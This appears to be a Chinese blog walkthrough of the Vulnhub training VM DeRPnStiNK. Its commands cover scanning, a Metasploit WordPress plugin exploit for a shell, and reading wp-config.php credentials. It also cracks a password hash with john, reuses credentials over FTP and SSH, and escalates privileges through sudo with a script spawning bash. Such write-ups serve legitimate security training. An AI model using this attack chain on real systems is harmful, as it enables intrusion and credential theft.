Vulnhub靶机-DeRPnStiNK

最新推荐文章于 2024-06-28 10:07:42 发布
最新推荐文章于 2024-06-28 10:07:42 发布
阅读量994 收藏 14
点赞数 18
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ergeLXT/article/details/140034819
版权

一、信息收集

1.主机发现

sudo arp-scan -l

2.扫描端口等详细信息

nmap -p- -A 192.168.127.166

二、渗透

1.访问网站

扫描一下目录

dirb http://192.168.127.166

服务器上有wordpress,打开/weblog/目录,被重定向到 http://derpnstink.local/weblog

在主机host文件添加域名来访问网站

访问域名 http://derpnstink.local 查看源码

发现flag1

flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

2.访问phpmyadmin

http://192.168.127.166/php/phpmyadmin

尝试弱口令 root/root 登录失败

3.访问wordpress

http://192.168.127.166/weblog/wp-admin

尝试弱口令 admin/admin 登录成功

4.wpscan扫描

使用wpscan来枚举网站 http://derpnstink.local/weblog 的插件、主题和用户

wpscan --url http://derpnstink.local/weblog/ --enumerate p,t

存在插件slideshow

搜索一下slideshow插件的漏洞

searchsploit slideshow

5.反弹shell

msfconsole
search slideshow
use 1
show options
set wp_password admin
set wp_user admin
set targeturi /weblog
set vhost derpnstink.local
set rhost 192.168.127.166
run

python -c 'import pty; pty.spawn("/bin/bash")'

查看配置文件

cd /var/www/html/weblog
ls -la
cat wp-config.php

得到用户名和密码

root/mysql

连接mysql

mysql -uroot -pmysql

查看发现不可以任意上传下载文件,只能在指定目录下上传下载文件,不可以使用udf

show global variables like 'secure%';

6.登录phpmyadmin

root/mysql

登录成功

拿到flag2

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

查看wp_users发现另一个用户unclestinky

密码是hash加密过的值

$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41

john破解

echo "$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41" > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

得到密码 wedgie57

wordpress登录用户unclestinky

发现得到的是flag2,没有其他有用的信息

7.ssh登录

查看/home

mrderp
stinky

查看/etc/passwd

发现这是两个用户

尝试ssh登录,密码使用wedgie57

ssh mrderp@192.168.127.166
ssh stinky@192.168.127.166

发现ssh不支持密码登陆,只可以通过指纹登陆

还有一个21端口,尝试登陆一下,使用stinky/wedgie57登陆成功

ftp 192.168.127.166

在ftp中找到ssh登陆的key,使用stinky用户登录成功

一直遍历ssh目录,得到key.txt文件

ssh登录用户stinky

chmod 700 key.txt
ssh -i key.txt stinky@192.168.127.166

解决方案 -o PubkeyAcceptedKeyTypes=+ssh-rsa

ssh -i key.txt stinky@192.168.127.166 -o PubkeyAcceptedKeyTypes=+ssh-rsa

切换目录到Desktop,拿到flag

在Documents目录中找到一个derpissues.pcap包下载下来

打开wireshark分析流量包

找到密码

derpderpderpderpderpderpderp

然后使用 mrderp / derpderpderpderpderpderpderp 登入

成功登录

8.提权

sudo -l

按照提示切换目录

cd /home/mrderp/binaries/derpy*

发现没有此目录,创建binaries和derpy*

cd /home/mrderp
mkdir binaries
cd binaries
echo '/bin/bash' > derpy.sh
chmod 777 derpy.sh
sudo ./derpy.sh

提权成功

拿flag

得到flag4

Hardog123
关注
  • 18
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
vulnhub靶机:GoldenEye-v1
prettyX的博客
04-06 992
靶机介绍 靶机下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 开始 1、ip探测,本次靶机的ip为:192.168.1.109 //kali arp-scan -l 2、nmap端口扫描 3、先尝试访问80端口 4、访问robots.txt,404 5、查看网页源码 6、继续查看这个.js文件 “Bori...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
vulnhub靶机
weixin_43902100的博客
09-28 282
vulnhub靶场:ME AND MY GIRLFRIEND: 1 靶机下载地址:http://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 实验环境:VMware,kali虚拟机 实战WP 寻找靶机ip,arp-scan -l,发现靶机IP为192.168.46.131(如果得不到靶机的地址,可能是因为靶机的网卡信息不对参考:https://blog.csdn.net/asstart/article/details/103433065) nmap扫描
Vulnhub靶机-PumpkinFestival
最新发布
ergeLXT的博客
06-28 636
需要修改本地hosts文件之后进行访问,添加pumpkins.local到hosts文件之后访问。使用 echo 命令创建一个名为alohomora的文件,其中复制了/bin/bash。本机尝试,在本机ftp登录靶机,拿到data,解压,解密到key(2)文件,然后ssh登录。登录名为admin的wp-admin用户,在得到令牌二的时候获取到一个关键字。在上面的目录中除token.txt之外,还有一个NOOOOO目录,继续访问。有一个NO目录,继续访问,经过多次遍历,找到token.txt。
Vulnhub靶机
weixin_43902100的博客
09-21 647
Vulnhub靶机渗透测试实战(一):CHERRY: 1 下载地址:http://www.vulnhub.com/entry/cherry-1,552/ 实验环境:VMware,kali虚拟机 将下载好的镜像文件导入VMware 局域网内扫描主机 arp-scan -l 一般情况最大最小的不会是靶机的IP,所以靶机的IP为:192.168.46.130 nmap扫描主机,查看开启了那些端口 nmap -sV -p- 192.168.46.130 发现开放了80,7755两个端口,进行访问,发现两个
VulnHub靶机-SkyTower
Slow_的博客
02-26 673
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
Vulnhub靶机——DC-1
流水不争先,争的是滔滔不绝
04-18 865
Vulnhub靶机——DC-1,cms(Drupal 7)存在框架漏洞,msf利用框架漏洞拿到普通用户的shell,再通过SUID提权
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机 Lin.security
菜浪马废的博客
04-27 255
给了登录账号 直接拿靶机登录 第一种方法 第二种方法
Vulnhub靶机 FourAndSix2
菜浪马废的博客
09-16 165
目标靶机ip:192.168.80.139 开放nfs 有一个压缩文件 里面有id-rsa 但是加密了 得到密码:chocolate 用户名:user 还有一层验证 cat /usr/share/wordlists/rockyou.txt | while read pass; do if ssh-keygen -c -C “user@forandsix” -P $pass -f id_rsa &>/dev/null; then echo $pass; break; fi; d.
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 1026
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
Vulnhub靶机:LAMPSECURITY_ CTF5
LainWith的博客
12-23 1133
(此系列共5台)发布日期:2009年5月10日难度:初运行环境:VMware Workstation目标:取得 root 权限补充:解压下载得到的靶机,你会看到自带的一份官方攻略主机发现端口扫描+漏洞扫描敏感信息泄露cms挂马敏感信息提权。
Vulnhub-靶机-SickOs 1.2
qq_43264813的博客
03-05 300
Vulnhub靶机—SickOs 1.2 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 文章目录Vulnhub靶机—SickOs 1.2一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.43.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -T4 -sV -p- 192.168.43.54 【步骤三】尝试22端口弱口令
Vulnhub靶机:Kioptrix_Level1
qq_48904485的博客
03-12 922
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1(192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Vulnhub靶机:Bellatrix
qq_48904485的博客
03-03 494
一、介绍 运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:Bellatrix(10.0.2.9) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/hogwarts-bellatrix,609/ 二、信息收集 使用nmap主机发现靶机ip:10.0.2.9 使用nmap端口扫描发现靶机开放端口:22、80 nmap -A 10.0.2.9 -p 1-65535 打开网站未发现什么功能点 查看源码发现隐藏信息,
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值